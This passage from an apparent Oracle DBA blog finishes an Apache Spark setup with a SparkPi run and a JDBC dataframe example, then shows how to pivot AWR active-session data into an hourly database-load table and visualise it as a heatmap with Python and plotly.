PATH=/usr/local/share/spark/spark-2.2.0/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/spark/.local/bin:/home/spark/bin

Now, we can run the SparkPi example:

[spark@spark ~]$ run-example SparkPi 500
Pi is roughly 3.141360702827214

Note: If you want to remove all those crappy INFO messages in the output, run the command below to configure log4j properties:

[spark@spark hadoop]$ cd $SPARK_HOME/conf
[spark@spark conf]$ sed 's/log4j\.rootCategory=INFO, console/log4j\.rootCategory=WARN, console/g' log4j.properties.template > log4j.properties

 

That’s done, now you’re ready to run your code on spark. Below, I wrote a sample code written in scala to create a dataframe from an oracle JDBC datasource,  and run a groupby function on it.

[spark@spark ~]$ spark-shell --driver-class-path ojdbc7.jar --jars ojdbc7.jar
Spark context Web UI available at http://192.168.99.14:4040
Spark context available as 'sc' (master = local[*], app id = local-1505397247969).
Spark session available as 'spark'.
Welcome to
      ____              __
     / __/__  ___ _____/ /__
    _\ \/ _ \/ _ `/ __/  '_/
   /___/ .__/\_,_/_/ /_/\_\   version 2.2.0
      /_/

Using Scala version 2.11.8 (Java HotSpot(TM) 64-Bit Server VM, Java 1.8.0_121)
Type in expressions to have them evaluated.
Type :help for more information.

scala> :load jdbc_sample.scala
Loading jdbc_sample.scala...
import java.util.Properties
connProps: java.util.Properties = {}
res0: Object = null
res1: Object = null
df: org.apache.spark.sql.DataFrame = [PROD_ID: decimal(6,0), PROD_NAME: string ... 20 more fields]

scala> df.printSchema
root
 |-- PROD_ID: decimal(6,0) (nullable = false)
 |-- PROD_NAME: string (nullable = false)
 |-- PROD_DESC: string (nullable = false)
 |-- PROD_SUBCATEGORY: string (nullable = false)
 |-- PROD_SUBCATEGORY_ID: decimal(38,10) (nullable = false)
 |-- PROD_SUBCATEGORY_DESC: string (nullable = false)
 |-- PROD_CATEGORY: string (nullable = false)
 |-- PROD_CATEGORY_ID: decimal(38,10) (nullable = false)
 |-- PROD_CATEGORY_DESC: string (nullable = false)
 |-- PROD_WEIGHT_CLASS: decimal(3,0) (nullable = false)
 |-- PROD_UNIT_OF_MEASURE: string (nullable = true)
 |-- PROD_PACK_SIZE: string (nullable = false)
 |-- SUPPLIER_ID: decimal(6,0) (nullable = false)
 |-- PROD_STATUS: string (nullable = false)
 |-- PROD_LIST_PRICE: decimal(8,2) (nullable = false)
 |-- PROD_MIN_PRICE: decimal(8,2) (nullable = false)
 |-- PROD_TOTAL: string (nullable = false)
 |-- PROD_TOTAL_ID: decimal(38,10) (nullable = false)
 |-- PROD_SRC_ID: decimal(38,10) (nullable = true)
 |-- PROD_EFF_FROM: timestamp (nullable = true)
 |-- PROD_EFF_TO: timestamp (nullable = true)
 |-- PROD_VALID: string (nullable = true)

scala> df.groupBy("PROD_CATEGORY").count.show
+--------------------+-----+
|       PROD_CATEGORY|count|
+--------------------+-----+
|      Software/Other|   26|
|               Photo|   10|
|         Electronics|   13|
|Peripherals and A...|   21|
|            Hardware|    2|
+--------------------+-----+

And … that’s it … have fun with Spark 😉

 

Database Load heatmap with AWR and Python

Recently, one of my customer asked me to design him a tool to quickly see the database load. He already did that for another Rdbms with a heatmap.

To do that, I used two distinct part in my work: Data Extraction, and Data Vizualisation.

Data Extraction from AWR

As he has licensed his databases with the Diagnostic pack , I decided to use AWR repository, and as I’m a bit lazy, I found a query from Marcin Przepiorowski (@pioro) and I modified it to pivot data.


col "00-01_ " for 90.99
col "01-02_ " for 90.99
col "02-03_ " for 90.99
col "03-04_ " for 90.99
col "04-05_ " for 90.99
col "05-06_ " for 90.99
col "06-07_ " for 90.99
col "07-08_ " for 90.99
col "08-09_ " for 90.99
col "09-10_ " for 90.99
col "10-11_ " for 90.99
col "11-12_ " for 90.99
col "12-13_ " for 90.99
col "13-14_ " for 90.99
col "14-15_ " for 90.99
col "15-16_ " for 90.99
col "16-17_ " for 90.99
col "17-18_ " for 90.99
col "18-19_ " for 90.99
col "19-20_ " for 90.99
col "20-21_ " for 90.99
col "21-22_ " for 90.99
col "22-23_ " for 90.99
col "23-24_ " for 90.99

WITH t AS
  (SELECT TO_CHAR(mtime,'YYYY/MM/DD') mtime,
    TO_CHAR(mtime,'HH24') d,
    LOAD AS value
  FROM
    (SELECT to_date(mtime,'YYYY-MM-DD HH24') mtime,
      ROUND(SUM(c1),2) AAS_WAIT,
      ROUND(SUM(c2),2) AAS_CPU,
      ROUND(SUM(cnt),2) AAS,
      ROUND(SUM(load),2) LOAD
    FROM
      (SELECT TO_CHAR(sample_time,'YYYY-MM-DD HH24') mtime,
        DECODE(session_state,'WAITING',COUNT(*),0)/360 c1,
        DECODE(session_state,'ON CPU',COUNT( *),0) /360 c2,
        COUNT(                               *)/360 cnt,
        COUNT(                               *)/360/cpu.core_nb load
      FROM dba_hist_active_sess_history,
        (SELECT value AS core_nb FROM v$osstat WHERE stat_name='NUM_CPU_CORES'
        ) cpu
      WHERE sample_time > sysdate - 30
      GROUP BY TO_CHAR(sample_time,'YYYY-MM-DD HH24'),
        session_state,
        cpu.core_nb
      )
    GROUP BY mtime
    )
  )
SELECT mtime,
  NVL("00-01_ ",0) "00-01_ ",
  NVL("01-02_ ",0) "01-02_ ",
  NVL("02-03_ ",0) "02-03_ ",
  NVL("03-04_ ",0) "03-04_ ",
  NVL("04-05_ ",0) "04-05_ ",
  NVL("05-06_ ",0) "05-06_ ",
  NVL("06-07_ ",0) "06-07_ ",
  NVL("07-08_ ",0) "07-08_ ",
  NVL("08-09_ ",0) "08-09_ ",
  NVL("09-10_ ",0) "09-10_ ",
  NVL("10-11_ ",0) "10-11_ ",
  NVL("11-12_ ",0) "11-12_ ",
  NVL("12-13_ ",0) "12-13_ ",
  NVL("13-14_ ",0) "13-14_ ",
  NVL("14-15_ ",0) "14-15_ ",
  NVL("15-16_ ",0) "15-16_ ",
  NVL("16-17_ ",0) "16-17_ ",
  NVL("17-18_ ",0) "17-18_ ",
  NVL("18-19_ ",0) "18-19_ ",
  NVL("19-20_ ",0) "19-20_ ",
  NVL("20-21_ ",0) "20-21_ ",
  NVL("21-22_ ",0) "21-22_ ",
  NVL("22-23_ ",0) "22-23_ ",
  NVL("23-24_ ",0) "23-24_ "
FROM t pivot( SUM(value) AS " " FOR d IN ('00' AS "00-01",'01' AS "01-02",'02' AS "02-03",'03' AS "03-04",'04' AS "04-05",'05' AS "05-06",'06' AS "06-07",'07' AS "07-08",
                                          '08' AS "08-09",'09' AS "09-10",'10' AS "10-11", '11' AS "11-12",'12' AS "12-13",'13' AS "13-14",'14' AS "14-15",'15' AS "15-16",
                                          '16' AS "16-17",'17' AS "17-18",'18' AS "18-19",'19' AS "19-20",'20' AS "20-21",'21' AS "21-22", '22' AS "22-23",'23' AS "23-24") 
            )
ORDER BY mtime

Nota: this query can be used to extract Database Load, Active Average Session (AAS), CPU part of AAS, and the Wait part of AAS. You just have to replace the value alias in the WITH Block.

Another point, I didn’t look at the plan, so I didn’t tune the statement … if you have some tricks to tune it … feel free to comment 😉

This query gives this kind of result:

MTIME      00-01_  01-02_  02-03_  03-04_  04-05_  05-06_  06-07_  07-08_  08-09_  09-10_  10-11_  11-12_  12-13_  13-14_  14-15_  15-16_  16-17_  17-18_  18-19_  19-20_  20-21_  21-22_  22-23_  23-24_
---------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- -------
2016/11/23    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.03    0.03    0.00    0.04    0.02    0.00    0.00    0.04    0.01    0.01    0.01    0.04    0.01
2016/11/24    0.02    0.03    0.01    0.03    0.05    0.02    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00
2016/12/06    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.01    0.01    0.02    0.02    0.00    0.00    0.00    0.00
2016/12/07    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.01    0.00    0.00    0.04    0.03    0.01    0.02    0.01    0.02    0.01    0.01    0.06    0.03
2016/12/08    0.03    0.05    0.02    0.02    0.03    0.03    0.02    0.02    0.03    0.02    0.01    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00
2016/12/12    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.03    0.02    0.05    0.02
2016/12/13    0.03    0.01    0.01    0.01    0.02    0.03    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00
2016/12/14    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.02    0.02    0.02    0.02    0.18    0.03    0.02    0.01    0.01    0.00    0.00    0.00    0.00    0.00

When the result is greater than 1, your database is loaded, but if it’s greater or equal that 2 … it’s really overloaded. In both cases, you have to analyze why ?

The problem with this kind of results is it’s only numbers and you have to analyze the complete results to detect when the problem occurs, here comes the data vizualisation part 😉

Data Vizualisation with Python

On the Oracle database Area, a guy has made a lot for visualization of performance data, it’s Kyle Hailey (@dbavigil). And Visualize your data is a very important thing to quickly identify bottleneck. So if you’re interested by data vizualisation you can visit his blog, you will find a lot of resources to extract AWR data and to visualize them (and other stuff).

So I decided to use Python to vizualise database load data extracted previously. To do that, I used python 3.4.5 with a bunch of packages installed:

  • cx_Oracle to connect Oracle Database and execute queries on your Oracle Database
  • numpy for arrays manipulation
  • plotly to graph the heatmap

The python script is available by following this URL: https://app.box.com/s/irjzi64lbne6xhw3t57aixqiy95toxht. Then, you have to modify it to enter the connection string (line 33).

My customer asked me that my script generates an HTML file  to visualize the heatmap in a browser (One of the reason I used plotly).

This script generates the file in /var/tmp (but you can modify it at the end) and then open the browser locally (So don’t forget to export X11 display if you run it on a linux server).

Below you can see the heatmap (X Axis is the hour range, Y Axis represent a day analyzed, the most recent day is on the first line of the heatmap.).

heatmap_s

This heatmap will help my customer to quickly visualize his database load, I hope it will help you too ;).

Of course, you can use the tool of your choice to visualize data (Tableau, Excel, Kibana etc.)